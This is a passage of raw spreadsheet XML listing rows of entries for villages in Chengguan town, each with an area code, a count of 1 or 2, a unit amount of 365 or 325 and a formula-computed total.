      </c>
      <c r="F178" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G178" s="17">
        <v>1</v>
      </c>
      <c r="H178" s="18">
        <v>365</v>
      </c>
      <c r="I178" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J178" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K178" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="179" customHeight="1" spans="1:11">
      <c r="A179" s="16" t="s">
        <v>679</v>
      </c>
      <c r="B179" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C179" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D179" s="16" t="s">
        <v>680</v>
      </c>
      <c r="E179" s="16" t="s">
        <v>416</v>
      </c>
      <c r="F179" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G179" s="17">
        <v>1</v>
      </c>
      <c r="H179" s="18">
        <v>365</v>
      </c>
      <c r="I179" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J179" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K179" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="180" customHeight="1" spans="1:11">
      <c r="A180" s="16" t="s">
        <v>681</v>
      </c>
      <c r="B180" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C180" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D180" s="17" t="s">
        <v>682</v>
      </c>
      <c r="E180" s="17" t="s">
        <v>683</v>
      </c>
      <c r="F180" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G180" s="17">
        <v>1</v>
      </c>
      <c r="H180" s="18">
        <v>365</v>
      </c>
      <c r="I180" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J180" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K180" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="181" customHeight="1" spans="1:11">
      <c r="A181" s="16" t="s">
        <v>684</v>
      </c>
      <c r="B181" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C181" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D181" s="17" t="s">
        <v>685</v>
      </c>
      <c r="E181" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F181" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G181" s="17">
        <v>2</v>
      </c>
      <c r="H181" s="18">
        <v>325</v>
      </c>
      <c r="I181" s="17">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J181" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K181" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="182" customHeight="1" spans="1:11">
      <c r="A182" s="16" t="s">
        <v>686</v>
      </c>
      <c r="B182" s="17" t="str">
        <f>B181</f>
        <v>城关镇</v>
      </c>
      <c r="C182" s="17" t="str">
        <f>C181</f>
        <v>北外村</v>
      </c>
      <c r="D182" s="23" t="s">
        <v>687</v>
      </c>
      <c r="E182" s="23" t="s">
        <v>499</v>
      </c>
      <c r="F182" s="17" t="str">
        <f>F181</f>
        <v>4113210102</v>
      </c>
      <c r="G182" s="17"/>
      <c r="H182" s="17"/>
      <c r="I182" s="17"/>
      <c r="J182" s="17"/>
      <c r="K182" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="183" customHeight="1" spans="1:11">
      <c r="A183" s="16" t="s">
        <v>688</v>
      </c>
      <c r="B183" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C183" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D183" s="17" t="s">
        <v>689</v>
      </c>
      <c r="E183" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F183" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G183" s="17">
        <v>2</v>
      </c>
      <c r="H183" s="18">
        <v>325</v>
      </c>
      <c r="I183" s="17">
        <f>H183*G183</f>
        <v>650</v>
      </c>
      <c r="J183" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K183" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="184" customHeight="1" spans="1:11">
      <c r="A184" s="16" t="s">
        <v>690</v>
      </c>
      <c r="B184" s="17" t="str">
        <f>B183</f>
        <v>城关镇</v>
      </c>
      <c r="C184" s="17" t="str">
        <f>C183</f>
        <v>东北六组</v>
      </c>
      <c r="D184" s="16" t="s">
        <v>691</v>
      </c>
      <c r="E184" s="16" t="s">
        <v>239</v>
      </c>
      <c r="F184" s="17" t="str">
        <f>F183</f>
        <v>4113210103</v>
      </c>
      <c r="G184" s="17"/>
      <c r="H184" s="17"/>
      <c r="I184" s="17"/>
      <c r="J184" s="17"/>
      <c r="K184" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="185" customHeight="1" spans="1:11">
      <c r="A185" s="16" t="s">
        <v>692</v>
      </c>
      <c r="B185" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C185" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D185" s="17" t="s">
        <v>693</v>
      </c>
      <c r="E185" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F185" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G185" s="17">
        <v>1</v>
      </c>
      <c r="H185" s="18">
        <v>365</v>
      </c>
      <c r="I185" s="17">
        <f>H185*G185</f>
        <v>365</v>
      </c>
      <c r="J185" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K185" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="186" customHeight="1" spans="1:11">
      <c r="A186" s="16" t="s">
        <v>694</v>
      </c>
      <c r="B186" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C186" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D186" s="17" t="s">
        <v>695</v>
      </c>
      <c r="E186" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F186" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G186" s="17">
        <v>1</v>
      </c>
      <c r="H186" s="18">
        <v>365</v>
      </c>
      <c r="I186" s="17">
        <f>H186*G186</f>
        <v>365</v>
      </c>
      <c r="J186" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K186" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="187" customHeight="1" spans="1:11">
      <c r="A187" s="16" t="s">
        <v>696</v>
      </c>
      <c r="B187" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C187" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D187" s="17" t="s">
        <v>697</v>
      </c>
      <c r="E187" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F187" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G187" s="17">
        <v>1</v>
      </c>
      <c r="H187" s="18">
        <v>365</v>
      </c>
      <c r="I187" s="17">
        <f>H187*G187</f>
        <v>365</v>
      </c>
      <c r="J187" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K187" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="188" customHeight="1" spans="1:11">
      <c r="A188" s="16" t="s">
        <v>698</v>
      </c>
      <c r="B188" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C188" s="17" t="s">
        <v>271</v>
      </c>
      <c r="D188" s="17" t="s">
        <v>699</v>
      </c>
      <c r="E188" s="17" t="s">
        <v>700</v>
      </c>
      <c r="F188" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G188" s="17">
        <v>1</v>
      </c>
      <c r="H188" s="18">
        <v>365</v>
      </c>
      <c r="I188" s="17">
        <f>H188*G188</f>
        <v>365</v>
      </c>
      <c r="J188" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K188" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="189" customHeight="1" spans="1:11">
      <c r="A189" s="16" t="s">
        <v>701</v>
      </c>
      <c r="B189" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C189" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D189" s="17" t="s">
        <v>702</v>
      </c>
      <c r="E189" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F189" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G189" s="17">
        <v>2</v>
      </c>
      <c r="H189" s="18">
        <v>325</v>
      </c>
      <c r="I189" s="17">
        <f>H189*G189</f>
        <v>650</v>
      </c>
      <c r="J189" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K189" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="190" customHeight="1" spans="1:11">
      <c r="A190" s="16" t="s">
        <v>704</v>
      </c>
      <c r="B190" s="17" t="str">
        <f>B189</f>
        <v>城关镇</v>
      </c>
      <c r="C190" s="17" t="str">
        <f>C189</f>
        <v>东北六组</v>
      </c>
      <c r="D190" s="16" t="s">
        <v>705</v>
      </c>
      <c r="E190" s="16" t="s">
        <v>239</v>
      </c>
      <c r="F190" s="17" t="str">
        <f>F189</f>
        <v>4113210103</v>
      </c>
      <c r="G190" s="17"/>
      <c r="H190" s="17"/>
      <c r="I190" s="17"/>
      <c r="J190" s="17"/>
      <c r="K190" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="191" customHeight="1" spans="1:11">
      <c r="A191" s="16" t="s">
        <v>706</v>
      </c>
      <c r="B191" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C191" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D191" s="17" t="s">
        <v>707</v>
      </c>
      <c r="E191" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F191" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G191" s="17">
        <v>1</v>
      </c>
      <c r="H191" s="18">
        <v>365</v>
      </c>
      <c r="I191" s="17">
        <f>H191*G191</f>
        <v>365</v>
      </c>
      <c r="J191" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K191" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="192" customHeight="1" spans="1:11">
      <c r="A192" s="16" t="s">
        <v>708</v>
      </c>
      <c r="B192" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C192" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D192" s="17" t="s">
        <v>709</v>
      </c>
      <c r="E192" s="17" t="s">
        <v>710</v>
      </c>
      <c r="F192" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G192" s="17">
        <v>1</v>
      </c>
      <c r="H192" s="18">
        <v>365</v>
      </c>
      <c r="I192" s="17">
        <f>H192*G192</f>
        <v>365</v>
      </c>
      <c r="J192" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K192" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="193" customHeight="1" spans="1:11">
      <c r="A193" s="16" t="s">
        <v>711</v>
      </c>
      <c r="B193" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C193" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D193" s="17" t="s">
        <v>712</v>
      </c>
      <c r="E193" s="17" t="s">
        <v>312</v>
      </c>
      <c r="F193" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G193" s="17">
        <v>2</v>
      </c>
      <c r="H193" s="18">
        <v>325</v>
      </c>
      <c r="I193" s="17">
        <f>H193*G193</f>
        <v>650</v>
      </c>
      <c r="J193" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K193" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="194" customHeight="1" spans="1:11">
      <c r="A194" s="16" t="s">
        <v>713</v>
      </c>
      <c r="B194" s="17" t="str">
        <f>B193</f>
        <v>城关镇</v>
      </c>
      <c r="C194" s="17" t="str">
        <f>C193</f>
        <v>东北六组</v>
      </c>
      <c r="D194" s="16" t="s">
        <v>714</v>
      </c>
      <c r="E194" s="16" t="s">
        <v>416</v>
      </c>
      <c r="F194" s="17" t="str">
        <f>F193</f>
        <v>4113210103</v>
      </c>
      <c r="G194" s="17"/>
      <c r="H194" s="17"/>
      <c r="I194" s="17"/>
      <c r="J194" s="17"/>
      <c r="K194" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="195" customHeight="1" spans="1:11">
      <c r="A195" s="16" t="s">
        <v>715</v>
      </c>
      <c r="B195" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C195" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D195" s="17" t="s">
        <v>716</v>
      </c>
      <c r="E195" s="17" t="s">
        <v>717</v>
      </c>
      <c r="F195" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G195" s="17">
        <v>2</v>
      </c>
      <c r="H195" s="18">
        <v>325</v>
      </c>
      <c r="I195" s="17">
        <f>H195*G195</f>
        <v>650</v>
      </c>
      <c r="J195" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K195" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="196" customHeight="1" spans="1:11">
      <c r="A196" s="16" t="s">
        <v>718</v>
      </c>
      <c r="B196" s="17" t="str">
        <f>B195</f>
        <v>城关镇</v>
      </c>
      <c r="C196" s="17" t="str">
        <f>C195</f>
        <v>中华村</v>
      </c>
      <c r="D196" s="16" t="s">
        <v>719</v>
      </c>
      <c r="E196" s="16" t="s">
        <v>554</v>
      </c>
      <c r="F196" s="17" t="str">
        <f>F195</f>
        <v>4113210108</v>
      </c>
      <c r="G196" s="17"/>
      <c r="H196" s="17"/>
      <c r="I196" s="17"/>
      <c r="J196" s="17"/>
      <c r="K196" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="197" customHeight="1" spans="1:11">
      <c r="A197" s="16" t="s">
        <v>720</v>
      </c>
      <c r="B197" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C197" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D197" s="17" t="s">
        <v>721</v>
      </c>
      <c r="E197" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F197" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G197" s="17">
        <v>2</v>
      </c>
      <c r="H197" s="18">
        <v>325</v>
      </c>
      <c r="I197" s="17">
        <f>H197*G197</f>
        <v>650</v>
      </c>
      <c r="J197" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K197" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="198" customHeight="1" spans="1:11">
      <c r="A198" s="16" t="s">
        <v>722</v>
      </c>
      <c r="B198" s="17" t="str">
        <f>B197</f>
        <v>城关镇</v>
      </c>
      <c r="C198" s="17" t="str">
        <f>C197</f>
        <v>东北一组</v>
      </c>
      <c r="D198" s="16" t="s">
        <v>723</v>
      </c>
      <c r="E198" s="25" t="s">
        <v>303</v>
      </c>
      <c r="F198" s="17" t="str">
        <f>F197</f>
        <v>4113210103</v>
      </c>
      <c r="G198" s="17"/>
      <c r="H198" s="17"/>
      <c r="I198" s="17"/>
      <c r="J198" s="17"/>
      <c r="K198" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="199" customHeight="1" spans="1:11">
      <c r="A199" s="16" t="s">
        <v>724</v>
      </c>
      <c r="B199" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C199" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D199" s="17" t="s">
        <v>725</v>
      </c>
      <c r="E199" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F199" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G199" s="17">
        <v>1</v>
      </c>
      <c r="H199" s="18">
        <v>365</v>
      </c>
      <c r="I199" s="17">
        <f>H199*G199</f>
        <v>365</v>
      </c>
      <c r="J199" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K199" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="200" customHeight="1" spans="1:11">
      <c r="A200" s="16" t="s">
        <v>726</v>
      </c>
      <c r="B200" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C200" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D200" s="17" t="s">
        <v>727</v>
      </c>
      <c r="E200" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F200" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G200" s="17">
        <v>2</v>
      </c>
      <c r="H200" s="18">
        <v>325</v>
      </c>
      <c r="I200" s="17">
        <f>H200*G200</f>
        <v>650</v>
      </c>
      <c r="J200" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K200" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="201" customHeight="1" spans="1:11">
      <c r="A201" s="16" t="s">
        <v>728</v>
      </c>
      <c r="B201" s="17" t="str">
        <f>B200</f>
        <v>城关镇</v>
      </c>
      <c r="C201" s="17" t="str">
        <f>C200</f>
        <v>西北村</v>
      </c>
      <c r="D201" s="16" t="s">
        <v>729</v>
      </c>
      <c r="E201" s="16" t="s">
        <v>303</v>
      </c>
      <c r="F201" s="17" t="str">
        <f>F200</f>
        <v>4113210106</v>
      </c>
      <c r="G201" s="17"/>
      <c r="H201" s="17"/>
      <c r="I201" s="17"/>
      <c r="J201" s="17"/>
      <c r="K201" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="202" customHeight="1" spans="1:11">
      <c r="A202" s="16" t="s">
        <v>730</v>
      </c>
      <c r="B202" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C202" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D202" s="17" t="s">
        <v>731</v>
      </c>
      <c r="E202" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F202" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G202" s="17">
        <v>2</v>
      </c>
      <c r="H202" s="18">
        <v>325</v>
      </c>
      <c r="I202" s="17">
        <f>H202*G202</f>
        <v>650</v>
      </c>
      <c r="J202" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K202" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="203" customHeight="1" spans="1:11">
      <c r="A203" s="16" t="s">
        <v>732</v>
      </c>
      <c r="B203" s="17" t="str">
        <f>B202</f>
        <v>城关镇</v>
      </c>
      <c r="C203" s="17" t="str">
        <f>C202</f>
        <v>东北一组</v>
      </c>
      <c r="D203" s="16" t="s">
        <v>733</v>
      </c>
      <c r="E203" s="16" t="s">
        <v>303</v>
      </c>
      <c r="F203" s="17" t="str">
        <f>F202</f>
        <v>4113210103</v>
      </c>
      <c r="G203" s="17"/>
      <c r="H203" s="17"/>
      <c r="I203" s="17"/>
      <c r="J203" s="17"/>
      <c r="K203" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="204" customHeight="1" spans="1:11">
      <c r="A204" s="16" t="s">
        <v>734</v>
      </c>
      <c r="B204" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C204" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D204" s="17" t="s">
        <v>735</v>
      </c>
      <c r="E204" s="17" t="s">
        <v>554</v>
      </c>
      <c r="F204" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G204" s="17">
        <v>1</v>
      </c>
      <c r="H204" s="18">
        <v>365</v>
      </c>
      <c r="I204" s="17">
        <f>H204*G204</f>
        <v>365</v>
      </c>
      <c r="J204" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K204" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="205" customHeight="1" spans="1:11">
      <c r="A205" s="16" t="s">
        <v>736</v>
      </c>
      <c r="B205" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C205" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D205" s="17" t="s">
        <v>737</v>
      </c>
      <c r="E205" s="17" t="s">
        <v>738</v>
      </c>
      <c r="F205" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G205" s="17">
        <v>1</v>
      </c>
      <c r="H205" s="18">
        <v>365</v>
      </c>
      <c r="I205" s="17">
        <f>H205*G205</f>
        <v>365</v>
      </c>
      <c r="J205" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K205" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="206" customHeight="1" spans="1:11">
      <c r="A206" s="16" t="s">
        <v>739</v>
      </c>
      <c r="B206" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C206" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D206" s="17" t="s">
        <v>740</v>
      </c>
      <c r="E206" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F206" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G206" s="17">
        <v>1</v>
      </c>
      <c r="H206" s="18">
        <v>365</v>
      </c>
      <c r="I206" s="17">
        <f>H206*G206</f>
        <v>365</v>
      </c>
      <c r="J206" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K206" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="207" customHeight="1" spans="1:11">
      <c r="A207" s="16" t="s">
        <v>741</v>
      </c>
      <c r="B207" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C207" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D207" s="17" t="s">
        <v>742</v>
      </c>
      <c r="E207" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F207" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G207" s="17">
        <v>1</v>
      </c>
      <c r="H207" s="18">
        <v>365</v>
      </c>
      <c r="I207" s="17">
        <f>H207*G207</f>
        <v>365</v>
      </c>
      <c r="J207" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K207" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="208" customHeight="1" spans="1:11">
      <c r="A208" s="16" t="s">
        <v>743</v>
      </c>
      <c r="B208" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C208" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D208" s="17" t="s">
        <v>744</v>
      </c>
      <c r="E208" s="17" t="s">
        <v>745</v>
      </c>
      <c r="F208" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G208" s="17">
        <v>2</v>
      </c>
      <c r="H208" s="18">
        <v>325</v>
      </c>
      <c r="I208" s="17">
        <f>H208*G208</f>
        <v>650</v>
      </c>
      <c r="J208" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K208" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="209" customHeight="1" spans="1:11">
      <c r="A209" s="16" t="s">
        <v>746</v>
      </c>
      <c r="B209" s="17" t="str">
        <f>B208</f>
        <v>城关镇</v>
      </c>
      <c r="C209" s="17" t="str">
        <f>C208</f>
        <v>中华村</v>
      </c>
      <c r="D209" s="16" t="s">
        <v>747</v>
      </c>
      <c r="E209" s="16" t="s">
        <v>748</v>
      </c>
      <c r="F209" s="17" t="str">
        <f>F208</f>
        <v>4113210108</v>
      </c>
      <c r="G209" s="17"/>
      <c r="H209" s="17"/>
      <c r="I209" s="17"/>
      <c r="J209" s="17"/>
      <c r="K209" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="210" customHeight="1" spans="1:11">
      <c r="A210" s="16" t="s">
        <v>749</v>
      </c>
      <c r="B210" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C210" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D210" s="17" t="s">
        <v>750</v>
      </c>
      <c r="E210" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F210" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G210" s="17">
        <v>2</v>
      </c>
      <c r="H210" s="18">
        <v>325</v>
      </c>
      <c r="I210" s="17">
        <f>H210*G210</f>
        <v>650</v>
      </c>
      <c r="J210" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K210" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="211" customHeight="1" spans="1:11">
      <c r="A211" s="16" t="s">
        <v>751</v>
      </c>
      <c r="B211" s="17" t="str">
        <f>B210</f>
        <v>城关镇</v>
      </c>
      <c r="C211" s="17" t="str">
        <f>C210</f>
        <v>西北村</v>
      </c>
      <c r="D211" s="16" t="s">
        <v>752</v>
      </c>
      <c r="E211" s="16" t="s">
        <v>288</v>
      </c>
      <c r="F211" s="17" t="str">
        <f>F210</f>
        <v>4113210106</v>
      </c>
      <c r="G211" s="17"/>
      <c r="H211" s="17"/>
      <c r="I211" s="17"/>
      <c r="J211" s="17"/>
      <c r="K211" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="212" customHeight="1" spans="1:11">
      <c r="A212" s="16" t="s">
        <v>753</v>
      </c>
      <c r="B212" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C212" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D212" s="17" t="s">
        <v>754</v>
      </c>
      <c r="E212" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F212" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G212" s="17">
        <v>1</v>
      </c>
      <c r="H212" s="18">
        <v>365</v>
      </c>
      <c r="I212" s="17">
        <f t="shared" ref="I212:I218" si="7">H212*G212</f>
        <v>365</v>
      </c>
      <c r="J212" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K212" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="213" customHeight="1" spans="1:11">
      <c r="A213" s="16" t="s">
        <v>755</v>
      </c>
      <c r="B213" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C213" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D213" s="17" t="s">
        <v>756</v>
      </c>
      <c r="E213" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F213" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G213" s="17">
        <v>1</v>
      </c>
      <c r="H213" s="18">
        <v>365</v>
      </c>
      <c r="I213" s="17">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J213" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K213" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="214" customHeight="1" spans="1:11">
      <c r="A214" s="16" t="s">
        <v>757</v>
      </c>
      <c r="B214" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C214" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D214" s="17" t="s">
        <v>758</v>
      </c>
      <c r="E214" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F214" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G214" s="17">
        <v>1</v>
      </c>
      <c r="H214" s="18">
        <v>365</v>
      </c>
      <c r="I214" s="17">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J214" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K214" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="215" customHeight="1" spans="1:11">
      <c r="A215" s="16" t="s">
        <v>759</v>
      </c>
      <c r="B215" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C215" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D215" s="17" t="s">
        <v>760</v>
      </c>
      <c r="E215" s="17" t="s">
        <v>761</v>
      </c>
      <c r="F215" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G215" s="17">
        <v>1</v>
      </c>
      <c r="H215" s="18">
        <v>365</v>
      </c>
      <c r="I215" s="17">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J215" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K215" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="216" customHeight="1" spans="1:11">
      <c r="A216" s="16" t="s">
        <v>762</v>
      </c>
      <c r="B216" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C216" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D216" s="17" t="s">
        <v>763</v>
      </c>
      <c r="E216" s="17" t="s">
        <v>578</v>
      </c>
      <c r="F216" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G216" s="17">
        <v>1</v>
      </c>
      <c r="H216" s="18">
        <v>365</v>
      </c>
      <c r="I216" s="17">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J216" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K216" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="217" customHeight="1" spans="1:11">
      <c r="A217" s="16" t="s">
        <v>764</v>
      </c>
      <c r="B217" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C217" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D217" s="17" t="s">
        <v>765</v>
      </c>
      <c r="E217" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F217" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G217" s="17">
        <v>1</v>
      </c>
      <c r="H217" s="18">
        <v>365</v>
      </c>
      <c r="I217" s="17">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J217" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K217" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="218" customHeight="1" spans="1:11">
      <c r="A218" s="16" t="s">
        <v>766</v>
      </c>
      <c r="B218" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C218" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D218" s="17" t="s">
        <v>767</v>
      </c>
      <c r="E218" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F218" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G218" s="17">
        <v>2</v>
      </c>
      <c r="H218" s="18">
        <v>325</v>
      </c>
      <c r="I218" s="17">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J218" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K218" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="219" customHeight="1" spans="1:11">
      <c r="A219" s="16" t="s">
        <v>768</v>
      </c>
      <c r="B219" s="17" t="str">
        <f>B218</f>
        <v>城关镇</v>
      </c>
      <c r="C219" s="17" t="str">
        <f>C218</f>
        <v>中华村</v>
      </c>
      <c r="D219" s="16" t="s">
        <v>769</v>
      </c>
      <c r="E219" s="16" t="s">
        <v>770</v>
      </c>
      <c r="F219" s="17" t="str">
        <f>F218</f>
        <v>4113210108</v>
      </c>
      <c r="G219" s="17"/>
